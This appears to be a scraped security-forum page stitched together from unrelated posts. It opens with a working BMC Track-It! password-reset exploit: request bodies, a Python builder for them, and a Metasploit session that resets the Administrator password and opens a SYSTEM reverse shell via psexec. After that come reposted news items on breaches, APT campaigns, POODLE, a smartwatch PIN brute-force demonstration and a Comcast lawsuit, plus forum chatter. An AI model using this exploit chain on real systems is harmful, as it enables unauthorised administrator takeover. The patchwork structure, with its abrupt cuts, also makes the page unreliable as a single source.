newPassword=n0tpassw0rd!&domain=WIN-P3AET0NFP1N&UserName=Administrator&CkbResetpassword=true

The domain and UserName parameters should match those supplied in the previous registration request. The newPassword parameter will need to meet any local password policy enforced by GPO. Combining these two requests allows an unauthorised user to register a local user as eligible for a password reset via the password reset form, then take advantage of the password reset vulnerability to change the password of any local user, including Administrator. Supplied is a Metasploit auxiliary module which changes the password of the Administrator user by default, then prints the domain, username, and password to use with psexec in order to log in over SMB. The Metasploit run below details changing the password with the attached module. Setting the password to the one reported by the auxiliary module, psexec is run and a shell as NT AUTHORITY\SYSTEM is gained.

msf auxiliary(bmc_trackit_pwd_reset) > show options

Module options (auxiliary/gather/bmc_trackit_pwd_reset):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DOMAIN                      no        The domain of the user.
                                        By default the local user's
                                        computer name will be autodetected
   LOCALUSER  Administrator    yes      The local user to change password for
   Proxies                     no       Use a proxy chain
   RHOST      192.168.1.57     yes      The target address
   RPORT      80               yes      The target port
   TARGETURI  /                yes      The path to BMC TrackIt
   VHOST                       no       HTTP server virtual host

msf auxiliary(bmc_trackit_pwd_reset) > run

[*] Please run the psexec module using:
[*] WIN-P3AET0NFP1N\Administrator:qGSvnJeuNO!1
[*] Auxiliary module execution completed
msf auxiliary(bmc_trackit_pwd_reset) > use exploit/windows/smb/psexec
msf exploit(psexec) > set SMBPass qGSvnJeuNO!1
SMBPass => qGSvnJeuNO!1
msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.1.31:4444
[*] Connecting to the server...
[*] Authenticating to 192.168.1.57:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \fNRBQEMV.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.57[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.57[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (NOAlMwJR - "MBvX")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \fNRBQEMV.exe...
[*] Sending stage (769024 bytes) to 192.168.1.57
[*] Meterpreter session 4 opened (192.168.1.31:4444 -> 192.168.1.57:50668) at 2014-10-12 00:44:12 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

-- http://volatile-minds.blogspot.com -- blog
-- http://www.volatileminds.net -- website

Source
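The two captured requests above can also be chained outside Metasploit. The following Python sketch only builds the two urlencoded request bodies; the helper names and email value are invented for illustration, and actually delivering the POSTs (with the ASP.NET_SessionId cookie described earlier) is left out:

```python
from urllib.parse import urlencode

def register_body(domain, user, email, answer="not"):
    # Mirrors the first captured request. Repeated fields
    # (SelectedQuestion, answer, confirmanswer) are passed as pairs so
    # they appear twice, as in the original traffic.
    params = [
        ("domainname", domain),
        ("userName", user),
        ("emailaddress", email),
        ("userQuestions",
         '[{"Id":1,"Answer":"%s"},{"Id":2,"Answer":"%s"}]' % (answer, answer)),
        ("updatequesChk", "false"),
        ("SelectedQuestion", "1"),
        ("SelectedQuestion", "2"),
        ("answer", answer),
        ("answer", answer),
        ("confirmanswer", answer),
        ("confirmanswer", answer),
    ]
    return urlencode(params)

def reset_body(domain, user, new_password):
    # Mirrors the second captured request.
    return urlencode([
        ("newPassword", new_password),
        ("domain", domain),
        ("UserName", user),
        ("CkbResetpassword", "true"),
    ])

print(register_body("WIN-P3AET0NFP1N", "Administrator", "a@b.com"))
print(reset_body("WIN-P3AET0NFP1N", "Administrator", "n0tpassw0rd!"))
```

The first body would be POSTed to /PasswordReset/Application/Register and the second to /PasswordReset/Application/ResetPassword, reusing the same session cookie for both.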
-
AMHERST – A group purporting to be members of the hacker collective Anonymous is taking aim at Nova Scotia Power. In a video made late Wednesday, the group says it has information showing corruption within the monopoly. They are calling the action #OpTakeNSPowerBack. “For too long we have closely watched as Nova Scotians have struggled with their power bills. We have watched as they have had to make tough choices between power, food and heat, mortgages, and other costs of living,” the video says. The group calls the decisions Nova Scotians are making today in the face of high energy costs cruel and uncalled-for sacrifices. “Nova Scotia has had enough. It is now time for you to take note of our demands,” the video says. The demands include reasonable power rates, a commitment not to disconnect the power of those unable to pay their bills, billing based on actual power usage instead of estimated charges, a five-year wage freeze for all corporate members, and an end to corporate kickbacks and bonuses. The group was vague on possible consequences if its demands were not met, only saying they have information that will confirm corruption within the private monopoly. The video released Wednesday can be viewed online. Source
-
CHARGE Anywhere, a New Jersey-based developer of payment gateway and mobile payment applications, on Tuesday disclosed that it had been breached and that hackers had access to transactions leaving its network, perhaps going back as far as 2009. Most of the traffic was encrypted, the company said in its disclosure statement, but some plain text data was stolen between Aug. 17 and Sept. 22. The number of records accessed or stolen was not disclosed. “The investigation revealed that an unauthorized person initially gained access to the network and installed sophisticated malware that was then used to create the ability to capture segments of outbound network traffic,” CHARGE Anywhere’s statement read. “Much of the outbound traffic was encrypted. However, the format and method of connection for certain outbound messages enabled the unauthorized person to capture and ultimately then gain access to plain text payment card transaction authorization requests.” CHARGE Anywhere said the malware has been removed from its network since it was discovered Sept. 22. Evidence of network capture exists, they said, for traffic segments between Aug. 17 and Sept.22, but it’s likely this capability was available to the hackers dating back to Nov. 5, 2009. The payment authorization requests, CHARGE Anywhere said, may include cardholder name, account number, expiration date and verification code. “CHARGE Anywhere commenced the investigation that uncovered and shut down the attack after being asked to investigate fraudulent charges that appeared on cards that had been legitimately used at certain merchants,” the company said. “The malware was immediately removed and we engaged a leading computer security firm to investigate how the malware was used and work with us to continue to enhance our network security measures.” The company’s payment gateways send traffic from point-of-sale terminals and systems to payment processors. 
Merchant and processor systems, however, were not breached, the company said, adding that it is continuing to route merchant transactions. “We have also been working with the credit card companies and processors to provide them with a list of merchants and the account numbers for cards used during the period at issue so that the banks that issued those cards can be alerted,” CHARGE Anywhere said. “When banks receive these alerts, they can conduct heightened monitoring of transactions to detect and prevent unauthorized charges.” The company also set up a page where consumers can search for merchants by name and location to determine if they were affected by the breach. Retailer security has been headline news since the Target breach a year ago. Security experts and government entities have issued warnings about malware targeting point-of-sale systems and the need to encrypt data. Small retailers and hospitality providers are particularly under the gun because they’re under-resourced and rely on vendors for security. Even large retailers, such as Target, have suffered. Last week, a Minnesota District Court judge ruled Target negligent in its breach, allowing a litany of class-action lawsuits from consumers and financial organizations to proceed. Source
-
Red October Attackers Return With CloudAtlas APT Campaign
Aerosol posted a topic in Stiri securitate
The attackers behind the Red October APT campaign that was exposed nearly two years ago have resurfaced with a new campaign that is targeting some of the same victims and using similarly constructed tools and spear phishing emails. Red October emerged in January 2013 and researchers found that the attackers were targeting diplomats in some Eastern European countries, government agencies and research organizations with malware that could steal data from desktops, mobile devices and FTP servers. The attackers had a wide variety of tools at their disposal and used unique victim IDs and had exploits for a number of vulnerabilities. The Red October attacks began with highly targeted spear phishing emails, some of which advertised a diplomatic car for sale. The new CloudAtlas campaign, disclosed Wednesday by researchers at Kaspersky Lab, also uses that same spear phishing lure and has targeted some of the same victims hit by Red October. Researchers believe the same group may be behind both campaigns, based on similarities in tactics, tools and targets. “In August 2014, some of our users observed targeted attacks with a variation of CVE-2012-0158 and an unusual set of malware. We did a quick analysis of the malware and it immediately stood out because of certain unusual things that are not very common in the APT world,” researchers at Kaspersky said in an analysis of the attack. “At least one of them immediately reminded us of RedOctober, which used a very similarly named spearphish: “Diplomatic Car for Sale.doc”. As we started digging into the operation, more details emerged which supported this theory. Perhaps the most unusual fact was that the Microsoft Office exploit didn’t directly write a Windows PE backdoor on disk. Instead, it writes an encrypted Visual Basic Script and runs it.” Both Red October and CloudAtlas have targeted the same victims. Not just the same organizations, but some of the same machines.
In one case, a machine was attacked only twice in the last two years, once by Red October and once by CloudAtlas. Both campaigns also hit victims in the same countries: Russia, Belarus, Kazakhstan and India. The two campaigns also use similar malware tools. “Both Cloud Atlas and RedOctober malware implants rely on a similar construct, with a loader and the final payload that is stored encrypted and compressed in an external file. There are some important differences though, especially in the encryption algorithms used – RC4 in RedOctober vs AES in Cloud Atlas,” Kaspersky researchers said. “The usage of the compression algorithms in Cloud Atlas and RedOctober is another interesting similarity. Both malicious programs share the code for LZMA compression algorithm. In CloudAtlas it is used to compress the logs and to decompress the decrypted payload from the C&C servers, while in Red October the ‘scheduler’ plugin uses it to decompress executable payloads from the C&C.” The C2 infrastructure for the CloudAtlas campaign is somewhat unusual. The attackers are using accounts at Swedish cloud provider CloudMe to communicate with compromised machines. “The attackers upload data to the account, which is downloaded by the implant, decrypted and interpreted. In turn, the malware uploads the replies back to the server via the same mechanism,” the researchers said. Officials at CloudMe said on Twitter that they are working to delete any CloudAtlas C2 accounts. “Yes, we are permanently deleting all accounts that we can identify as involved in the #inception #cloudatlas #apt #surveillance,” the company said. Researchers at Blue Coat have also looked at the new campaign, which they’ve named Inception, and found that the attackers have created tools to compromise a variety of mobile platforms, as well. “The framework continues to evolve.
Blue Coat Lab researchers have recently found that the attackers have also created malware for Android, BlackBerry and iOS devices to gather information from victims, as well as seemingly planned MMS phishing campaigns to mobile devices of targeted individuals. To date, Blue Coat has observed over 60 mobile providers such as China Mobile, O2, Orange, SingTel, T-Mobile and Vodafone, included in these preparations, but the real number is likely far higher,” Snorre Fagerland and Waylon Grange from Blue Coat Lab wrote. Source -
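As quoted above, Red October and Cloud Atlas share code for the LZMA compression algorithm, used to pack logs and to unpack payloads fetched from the C&C. A minimal sketch of that pattern using Python's standard lzma module (the payload bytes are invented stand-ins, not real implant data):

```python
import lzma

# Invented stand-in for an executable plugin payload staged by a C&C server.
payload = b"\x4d\x5a" + b"plugin code" * 100

# Server side: compress the payload before staging it for download.
packed = lzma.compress(payload, preset=9)

# Implant side: decompress after retrieval, as Red October's 'scheduler'
# plugin does with executable payloads from the C&C.
unpacked = lzma.decompress(packed)

assert unpacked == payload
print("compressed", len(payload), "bytes down to", len(packed))
```

The round trip is lossless, which is what lets the implant reconstruct an exact executable from the much smaller blob it downloads.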
Cable and Internet service conglomerate Comcast is facing a class-action lawsuit stemming from its use of customer routers as personal home Wi-Fi networks as well as public-facing wireless hotspots available for other Comcast-Xfinity customers. Toyer Grear and Jocelyn Harris, on behalf of themselves and the rest of the class, allege that Comcast is violating the Computer Fraud and Abuse Act, California’s Comprehensive Computer Data Access and Fraud Act, and the Business and Professions Code. The class action was filed in a San Francisco court on Dec. 4. In order to offer services similar to those of its competitors – namely companies such as AT&T and Verizon with cellular infrastructure that enabled them to deploy public-facing Wi-Fi hotspots – Comcast decided that it could use its network of millions of customer routers to build a similar network of Wi-Fi hotspots without needing cell towers. So in recent years, Comcast began leasing dual-band routers capable of broadcasting separate wireless networks to its customers: one for home networks and a second, public-facing network available for anyone with Comcast-Xfinity login credentials. According to the suit, Comcast aims to have 8 million such hotspots available by the end of 2014. In fact, if you live in an area dominated by Comcast and you look at the wireless networks in range of your computer’s receiver, you will almost certainly notice a wireless network named “xfinitywifi.” Problematically, the class alleges that Comcast does not obtain proper prior consent before deploying customer equipment for public use, though Comcast contends that it informed affected customers well in advance via emails and letters. “Indeed, without obtaining its customers’ authorization for this additional use of their equipment and resources, over which the customer has no control, Comcast has externalized the costs of its national Wi-Fi network onto its customers,” the complaint alleges.
“The new wireless routers the company issues consume vastly more electricity in order to broadcast the second, public Xfinity Wi-Fi hotspot, which cost is born by the residential customer.” Through this practice, Comcast is also accused of degrading home Internet performance and subjecting its customers to potential security risks. Comcast has a list of compatible routers on its website. That list makes note of the default router access credentials for each model, though it wouldn’t take much guess-work considering that the usernames are either blank or “admin” and the passwords are all either “password” or “admin.” Users have the capacity to change these passwords, but most do not. Some routers come with install wizards that automatically change the router admin access password to the customer’s chosen wireless network password, but it’s unclear if the Comcast routers include these wizards or if customers use them. There’s an authentication bypass vulnerability affecting the Netgear WNR1000 router that Comcast issues to customers. The second router listed by Comcast is Netgear’s WNR3500, which got hacked at the DEFCON router hacking contest in August. Secunia last year reported on a cross-site request forgery bug in the Linksys WRT310N, which is also on Comcast’s list. More than a cursory search through Google would very likely turn up any number of other issues. Users can update the firmware for their routers assuming the manufacturer has provided a security update, but most routers are low-memory devices, so updating them requires that the user find the proper firmware image and upload it manually to the router. Such updates are not announced to users in any meaningful way, nor are instructions provided on where to download the updated firmware and how to install it. In reality, users simply do not install router updates.
There is also the question of whether a particular vulnerability in one of these routers could be exploited on the public-facing Wi-Fi hotspot in order to gain access — without authentication — to the personal, home network. In November, Threatpost covered a bug in a Belkin router through which an attacker, after accessing the router’s guest network, could leap-frog onto the associated private network without authentication. For its part, Comcast is defending its decision. “We disagree with the allegations in this lawsuit and believe our Xfinity WiFi home hotspot program provides real benefits to our customers,” Comcast said in a statement. “We provide information to our customers about the service and how they can easily turn off the public WiFi hotspot if they wish http://wifi.comcast.com/faqs.html.” Comcast is also downplaying claims that partitioning routers for public and private use would affect personal Internet speeds. “For your in-home WiFi network, we have provisioned the XFINITY WiFi feature to support robust usage, and therefore anticipate minimal impact to the in-home WiFi network,” the company claims. “As with any shared medium, there can be some impact as more devices share the network. For data usage, the activities of visiting users are associated with the visitors’ accounts and therefore do not impact the homeowner.” The company also attempted to push back against security concerns by explaining that the login process is totally encrypted. However, in all of the ISP’s talking points, it never addresses how this new practice affects the security of new and existing routers. Source
-
Yesterday’s Internet Explorer security bulletin, in addition to patching 14 vulnerabilities, also affords Windows admins the ability to disable SSL 3.0 in IE 11 for Protected Mode sites. Doing so eliminates exposure to POODLE SSL attacks. Microsoft said the change is off by default for now, but will turn it on by default in IE on Feb. 10, 2015. This is Microsoft’s first step toward disabling SSL 3.0 by default in all of its online services. Other providers such as Google have already moved in this direction. Chrome 39, released in late November, also removed support for the fallback to SSL 3.0. The move from Microsoft comes two days after the latest news in the POODLE saga that revealed some implementations of TLS are also vulnerable. TLS is the replacement for SSL used for secure communication in many organizations. POODLE attacks enable hackers to decrypt traffic over a supposedly secure connection. The weakness comes into play when attempts to negotiate a secure connection fail: webservers sometimes fall back to an older protocol in order to enable the connection, and SSL 3.0 is vulnerable to padding oracle attacks against the webserver, putting supposedly encrypted traffic at risk. “By interfering with the connection between the target client and server, a man-in-the-middle can force a downgrade from TLS 1.0 or newer, more secure protocols, to the SSL 3.0 protocol,” Microsoft explained in its announcement on Tuesday. “The vast majority of the time, a fallback from TLS 1.0 to SSL 3.0 is the result of an innocent error, but this is indistinguishable from a man-in-the-middle attack.” With yesterday’s IE cumulative update, users can opt in to block SSL 3.0 fallback in the most current version of the browser.
“Enterprise customers are able to configure this behavior via Group Policy, and this behavior will also be configurable via registry or using an easy, one-click Fix it solution,” Microsoft said, adding that configuration details are available in Knowledge Base article 3013210. Google researcher Adam Langley exposed the TLS issue this week, noting that F5 security appliances, as well as some from A10 Networks were vulnerable. F5 has already patched its boxes, while A10 was expected to patch yesterday. “This seems like a good moment to reiterate that everything less than TLS 1.2 with an AEAD cipher suite is cryptographically broken. An IETF draft to prohibit RC4 is in Last Call at the moment but it would be wrong to believe that RC4 is uniquely bad,” Langley said. Yesterday’s IE bulletin, MS14-080, patched 14 memory corruption and ASLR bypass vulnerabilities in versions going back to IE 6 on the client side. The issue was less severe in Windows servers, Microsoft said. Source
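The downgrade described above can be modeled in a few lines. This is a toy simulation of the fallback logic only, not real TLS code; the version list and function names are illustrative:

```python
# Toy model of the insecure "downgrade dance": when a handshake at one
# protocol version fails, the client retries with the next-oldest version.
# A man-in-the-middle who forces failures can walk the client down to SSLv3.
VERSIONS = ["TLS 1.2", "TLS 1.1", "TLS 1.0", "SSL 3.0"]

def negotiate(server_accepts, mitm_blocks=frozenset()):
    """Return the version the client ends up using, or None."""
    for version in VERSIONS:
        if version in mitm_blocks:
            continue  # attacker interferes; handshake appears to fail
        if version in server_accepts:
            return version
    return None

# An honest connection negotiates the best mutual version.
assert negotiate({"TLS 1.2", "SSL 3.0"}) == "TLS 1.2"

# An attacker who blocks every TLS attempt forces SSL 3.0, where the
# POODLE padding-oracle attack applies.
forced = negotiate({"TLS 1.2", "SSL 3.0"},
                   mitm_blocks={"TLS 1.2", "TLS 1.1", "TLS 1.0"})
print("fallback result:", forced)  # prints: fallback result: SSL 3.0
```

Disabling SSL 3.0, as the IE update allows, simply removes the last entry from the list, so the forced fallback fails outright instead of landing on a broken protocol.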
-
Black Energy Malware May Be Exploiting Patched WinCC Flaw
Aerosol posted a topic in Stiri securitate
Experts at ICS-CERT say that the BlackEnergy malware that has been seen infecting human-machine interface systems may be exploiting a recently patched vulnerability in the Siemens SIMATIC WinCC software in order to compromise some systems. The ICS-CERT originally issued an alert about the attacks by the venerable BlackEnergy malware in October, and at the time the group warned that the malware was targeting three specific HMI products: GE Cimplicity, Advantech/Broadwin WebAccess, and Siemens WinCC. “At this time, ICS-CERT has not identified any attempts to damage, modify, or otherwise disrupt the victim systems’ control processes. ICS-CERT has not been able to verify if the intruders expanded access beyond the compromised HMI into the remainder of the underlying control system. However, typical malware deployments have included modules that search out any network-connected file shares and removable media for additional lateral movement within the affected environment. The malware is highly modular and not all functionality is deployed to all victims,” the alert said. At the time of the original alert, ICS-CERT wasn’t sure how WinCC systems were being infected, but it now appears that BlackEnergy may be targeting a vulnerability that was patched in November by Siemens. “While ICS-CERT lacks definitive information on how WinCC systems are being compromised by BlackEnergy, there are indications that one of the vulnerabilities fixed with the latest update for SIMATIC WinCC may have been exploited by the BlackEnergy malware. ICS-CERT strongly encourages users of WinCC, TIA Portal, and PCS7 to update their software to the most recent version as soon as possible,” the updated alert says. Siemens patched two vulnerabilities in WinCC on Nov. 11, including one that could allow remote code execution. Source
Allowing the warrant to move forward, Microsoft argues, "would violate international law and treaties, and reduce the privacy protection of everyone on the planet." Microsoft is preparing to fight a U.S. government search warrant that seeks its customer emails stored abroad. Microsoft's chief counsel Brad Smith and other tech attorneys will explain why the company should not have to comply with a warrant for data hosted at a facility in Dublin, Ireland, in a panel moderated by ABC's Charlie Gibson in New York next Monday. Microsoft (MSFT, Tech30) has already argued in a June court filing that prosecutors had no right to execute the warrant because it is outside the country's jurisdiction. The identity of the customers that the government is after isn't clear, though the case relates to alleged drug trafficking and money laundering. Allowing the warrant to move forward, Microsoft argued, "would violate international law and treaties, and reduce the privacy protection of everyone on the planet." Verizon (VZ, Tech30) has also weighed in, submitting a brief in support of Microsoft's argument. The case raises questions about what role jurisdiction and physical borders play when it comes to digital information. The result of the lawsuit could have far-reaching implications for how tech companies deal with law enforcement. Tech companies store customer information at data centers all around the world. Microsoft says its email users' information "resides on a specific server in the Dublin datacenter" and "does not exist in any form inside the United States." Prosecutors contend that the distinction isn't meaningful because electronic data is "readily available" for access by Microsoft employees in the United States. "Imposing the limitations urged by Microsoft would lead to absurd results and severely undercut criminal investigations conducted by U.S. law enforcement," Manhattan U.S.
Attorney Preet Bharara wrote in a court filing. Big tech companies receive thousands of requests for customer data each year from intelligence and traditional law enforcement agencies. Those requests have been under scrutiny in recent months following leaks from former NSA contractor Edward Snowden who revealed vast data grabs encompassing millions of people in the U.S. and foreign countries with no suspected links to terrorism. "Over the course of the past year, Microsoft and other U.S. technology companies have faced growing mistrust and concern about their ability to protect the privacy of personal information located outside the United States," Microsoft said in its June filing. This case is different, however, as it relates to a narrow criminal investigation in which a judge has already approved a warrant. Companies like Microsoft, Facebook (FB, Tech30) and Google (GOOG) regularly publish "transparency reports" detailing the amount and nature of data requests they receive from the government, though they can't provide information on individual cases. Microsoft says it doesn't consider these requests unless law enforcement officials have valid subpoenas, warrants or court orders. Source
-
It's pretty decent; it runs smoothly and looks good, and the mobile version is fine as well. Congratulations and good luck with the site.
-
We are living in an era of smart devices that we sync with our smartphones to make our lives simple and easy, but these smart devices that interoperate with our phones can leave our important personal data wide open to hackers and cybercriminals. Security researchers have demonstrated that the data sent between a smartwatch and an Android smartphone is not very secure and can be subjected to brute-force attacks, allowing attackers to intercept and decode users' data, including everything from text messages to Google Hangouts chats and Facebook conversations. This happens because the Bluetooth communication between most smartwatches and Android devices relies on a six-digit PIN code to transfer information between them in a secure manner. A six-digit PIN means roughly one million possible keys, which can easily be brute-forced by attackers to expose entire conversations in plain text. Researchers from the Romania-based security firm Bitdefender carried out a proof-of-concept hack against a Samsung Gear Live smartwatch and a paired Google Nexus 4 handset running Android L Preview. Using only readily available sniffing tools, the researchers found that the PIN obfuscating the Bluetooth connection between the two devices was easily brute-forced. A brute-force attack is one in which a nearby hacker attempts every possible combination until finding the correct one. Once they found the right match, they were able to monitor the information flowing between the smartwatch and the smartphone.

VIDEO DEMONSTRATION

You can watch the proof-of-concept video below, run on a Samsung Gear Live smartwatch and a paired Google Nexus 4 device running Android L Preview. The researchers explained that their findings were "pretty consistent with [their] expectations" and that, without a great deal of effort, encrypted communications between wearable technology and smartphones could be cracked and left open to prying eyes.
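To see why a six-digit PIN keyspace offers so little protection, consider this toy model in Python. The key derivation here is an invented stand-in (a single SHA-256 of the PIN), not the actual Bluetooth pairing algorithm; the point is only that all 10^6 candidates can be enumerated in about a second:

```python
import hashlib

def derive_key(pin: str) -> bytes:
    # Invented stand-in for the pairing key derivation; real Bluetooth
    # pairing is more involved, but the keyspace is just as small.
    return hashlib.sha256(pin.encode()).digest()

# What a nearby sniffer might capture: material that lets it recognize
# the correct key once guessed.
captured = derive_key("482913")

def brute_force(captured_key: bytes) -> str:
    # Try all one million six-digit PINs until one reproduces the capture.
    for candidate in range(1_000_000):
        pin = f"{candidate:06d}"
        if derive_key(pin) == captured_key:
            return pin
    return ""

recovered = brute_force(captured)
print("recovered PIN:", recovered)  # prints: recovered PIN: 482913
```

A keyspace this small is exhausted faster than a user can notice, which is why the article's suggested mitigations (NFC-delivered secrets, passphrases, or an application-layer encryption channel) all amount to enlarging or replacing the six-digit secret.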
This discovery matters particularly to those concerned about their personal data, and given the current growth of the smartwatch and wearables market, it will definitely make you think before using one.

HOW TO PROTECT YOURSELF FROM SUCH ATTACKS

One way to protect users from such attacks would be to use Near Field Communication (NFC) to safely transmit the PIN code to compatible smartwatches during pairing, but that would likely increase the cost and complexity of the devices. In addition, "using passphrases is also tedious as it would involve manually typing a possibly randomly generated string onto the wearable smartwatch," the report said. Another option would be for original equipment manufacturers (OEMs) and Google to provide an alternative mechanism that makes data transfers between the devices more secure. "Or we could supersede the entire Bluetooth encryption between Android device and smartwatch and use a secondary layer of encryption at the application level," the report offered. There are almost certainly other potential fixes available. Source
-
SECURITY RESEARCHERS have uncovered a sophisticated cyber espionage tool being used to launch "highly targeted attacks" designed to extract confidential information.

Security firm Blue Coat Labs claims to have identified the previously undocumented 'Inception' attack framework. The malware's design has "many layers", and so it is named Inception after the Hollywood blockbuster about a thief who entered people's dreams to steal secrets. Based on the data gathered so far, Blue Coat estimates that somewhere between 100 and 200 targets have been affected.

The firm found that, in all cases, the malware was embedded in Rich Text Format (RTF) files; vulnerabilities in this file format are exploited to gain remote access to victims' computers. The files are delivered via phishing emails with the booby-trapped documents attached.

The malware's targets include individuals in strategic positions: oil, finance and engineering executives, military officers, embassy personnel and government officials. The Inception attacks began by focusing on targets primarily located in Russia or related to Russian interests, but have since spread to targets in other locations around the world. The preferred malware delivery method is via phishing emails containing trojanised documents.

The attackers hide their identity by routing command and control traffic for the Windows platform indirectly through a Swedish cloud service provider, CloudMe, using the WebDAV protocol. This may also bypass many current detection mechanisms, said Blue Coat. "The attackers have added another layer of indirection to mask their identity by leveraging a proxy network composed of routers, most of which are based in South Korea, for their command and control communication," the firm said in its blog post. "It is believed that the attackers were able to compromise these devices based on poor configurations or default credentials."
Blue Coat senior principal security researcher Snorre Fagerland told The INQUIRER that the entire setup is meticulously designed for automation and operational security. "When the attackers want to send a phishing mail they use one of their hacked routers. The proxy port on the router cannot be connected to directly, it must first be opened. Attackers do that by connecting to a different port, authenticate by a unique password for this router, and ask the router to open its proxy door," he explained.

Fagerland said this is done in an automated fashion: computer one unlocks the router, seconds later computer two logs on and sends mail, and then the router is locked again. "Attackers had hundreds of these hacked routers at their disposal, all configured with different passwords and different port configurations," he added. "The attackers obviously had a database of this infrastructure, and were able to script the usage of this so that different machines had to cooperate to perform the necessary actions. The attackers also spread their actions thinly over this network of routers. When the attackers upload new content to CloudMe, they do so while iterating over their router network, so there are new IPs accessing the shares every time."

Blue Coat also believes that the framework is continuing to evolve, and that the attackers have created malware for Android, BlackBerry and iOS devices to gather information from as many victims as possible. The firm observed over 60 mobile providers, including China Mobile, O2, Orange, SingTel, T-Mobile and Vodafone, referenced in these preparations, but said the real number could be even higher. Although this is a large-scale attack, ordinary users need not worry, as it poses no danger to the average person. If you hold a strategically important role, however, the firm warns that you would be at risk.
"Once compromised, the attack is hard to notice as most of it only exists in memory," said Fagerland. "The WebDAV protocol traffic to CloudMe also looks unremarkable from the point of view of many intrusion detection systems." There is no quick fix to protect yourself from Inception; Blue Coat advises that users can best protect themselves with common sense. For example, if you receive an email or any other contact request that seems in the least out of the ordinary, let your security people check it out first. "Targeted attacks are usually poorly covered by your standard blocking product. So, you'll want to cover as many bases and angles as possible, with toolsets that allow you to tailor preventive measures to your own network and provide visibility and intelligence," explained Fagerland. "But the best protection is in the head." Source
-
Mobile payments biz Charge Anywhere has admitted a hacker may have been snooping on its systems for FIVE years. While probing an internal malware infection, Charge Anywhere discovered that someone had been able to eavesdrop on its network traffic since November 2009. That investigation revealed all sorts of sensitive data had been swiped from the global company's compromised computers, including customer names, card numbers, expiration dates and verification codes. The hackers succeeded in defeating Charge Anywhere's encryption before extracting data, as the outfit's statement explains:

Charge Anywhere commenced the investigation that uncovered and shut down the attack after being asked to investigate fraudulent charges that appeared on cards that had been legitimately used at certain merchants. Charge Anywhere’s investigation found malware that had not been previously detected by any anti-virus program. The malware was immediately removed and we engaged a leading computer security firm to investigate how the malware was used and work with us to continue to enhance our network security measures. The investigation revealed that an unauthorized person initially gained access to the network and installed sophisticated malware that was then used to create the ability to capture segments of outbound network traffic. Much of the outbound traffic was encrypted. However, the format and method of connection for certain outbound messages enabled the unauthorized person to capture and ultimately then gain access to plain text payment card transaction authorization requests.
Charge Anywhere, a New Jersey-headquartered biz that processes payments for mobile apps and websites, says crooks extracted the sensitive data from its computers between August 17 and September 24 this year – although someone had established the ability to sniff parts of its network traffic as far back as 2009: During the exhaustive investigation, only files containing the segments of captured network traffic from August 17, 2014 through September 24, 2014 were identified. Although we only found evidence of actual network traffic capture for this short time frame, the unauthorized person had the ability to capture network traffic as early as November 5, 2009. The firm has set up a help page allowing merchants to search an unpublished list of affected traders to find out whether or not they've been hit by the security breach. An FAQ aimed at web hawkers, which essentially advises them to keep calm and carry on as normal, can be found here [PDF]. The infiltration illustrates the importance for payment processors to fully encrypt sensitive data as it traverses their network, as cybercrime-focused investigative journalist Brian Krebs points out. Source
-
Two California residents have filed a class-action suit against Comcast in federal court for using their home's wireless router in an effort to create a nationwide network of public WiFi hotspots. The plaintiffs, Toyer Grear and his daughter Jocelyn Harris, accuse Comcast of "exploiting them for profit" in the suit, filed in U.S. District Court in San Francisco.

To compete with the large cell phone providers, the company is attempting to build its Xfinity WiFi Hotspot network, a second high-speed internet channel running over its customers' wireless gateway modems. That channel, separate from the one used by the customer, is intended for houseguests and Comcast customers using mobile devices while in range of one of the hotspots. Comcast's goal is to expand the network to eight million hotspots by year's end and to offer coverage in 19 of the largest cities in the U.S. Customers lease their modems from the company, which began activating the network in the Bay Area last fall.

While customers can opt out of the second channel, Grear and Harris contend in the suit that Comcast doesn't "obtain the customer's authorization prior to engaging in this use of the customer's equipment and Internet service for public, non-household use." They also contend that customers must bear "the costs of its national WiFi network," citing a test by Speedify, a Philadelphia-based company, which examined the second channel and found that it would push "tens of millions of dollars per month of the electricity bills needed to run their nationwide public Wi-Fi network onto consumers."

Calling home cable modems "very much 'Plug-and-Pray' (plug it in, pray there are no issues)," Trey Ford, global security strategist at Rapid7, maintained in comments emailed to SCMagazine.com that internet service providers (ISPs) "have a poor track record of patch management" for customer premise equipment (CPE).
The modems, he said, “are fraught with security issues but vendors are more concerned with making them easy to use than safe, stable and secure for the user.” The suit also said that tests showed that when the secondary channel is used heavily, customer electricity bills go up 30 to 40 percent. In addition, the set-up “subjects the customer to potential security risks” by enabling strangers to access the internet through customer routers “with the customer having no option to authorize” or control its use. As homes in the U.S. become more connected to the internet, “having a safe edge [like a cable modem] is extremely important,” Ford said. "I hope that Comcast has done a good job segmenting the 'guest' network from the subscriber's 'home network,' which is critical to the security of users who are forced to partake in this initiative.” He warned guests to the network to protect themselves because “this wireless network is completely unencrypted.” In the future, Ford expects security researchers to come down hard on Arris 852 and 862 wireless routers, examining them for security vulnerabilities and holding vendors accountable “in coordinated disclosure processes for any identified flaws.” He warned Comcast and Arris to “efficiently respond to vulnerability notifications from the research community” because the “vulnerabilities will not only bring press attention, but they will likely be referenced” in the Grear-Harris suit. The father-daughter duo also claimed they've experienced “decreased, inadequate speeds on their home Wi-Fi network,” as a result of Comcast's secondary channel. They are seeking an injunction against Comcast, forbidding the company from using home wireless routers as part of its public hotspot network as well as unspecified damages because, they said, Comcast violated the Computer Fraud and Abuse Act, California's Unfair Competition Law, and the state's Comprehensive Computer Data Access and Fraud Act, California Penal Code. Source
-
@klaryon then the problem is with the TV.
-
First of all, try to write grammatically; I noticed a bunch of mistakes in your post. You also posted in the wrong category, and posting here just because you don't have the required number of posts is NOT an excuse. Still, let me answer you: https://rstforums.com/forum/90488-ppi-up-2-5-install-dovada-plata.rst https://rstforums.com/forum/programe-de-afiliere.rst You'll find as many as you want there.
-
Hello and welcome! Off:// @TheAnalyst you got off on the wrong foot. People aren't saying this to put you down; they're just giving you advice that you should take into consideration.
-
Abstract

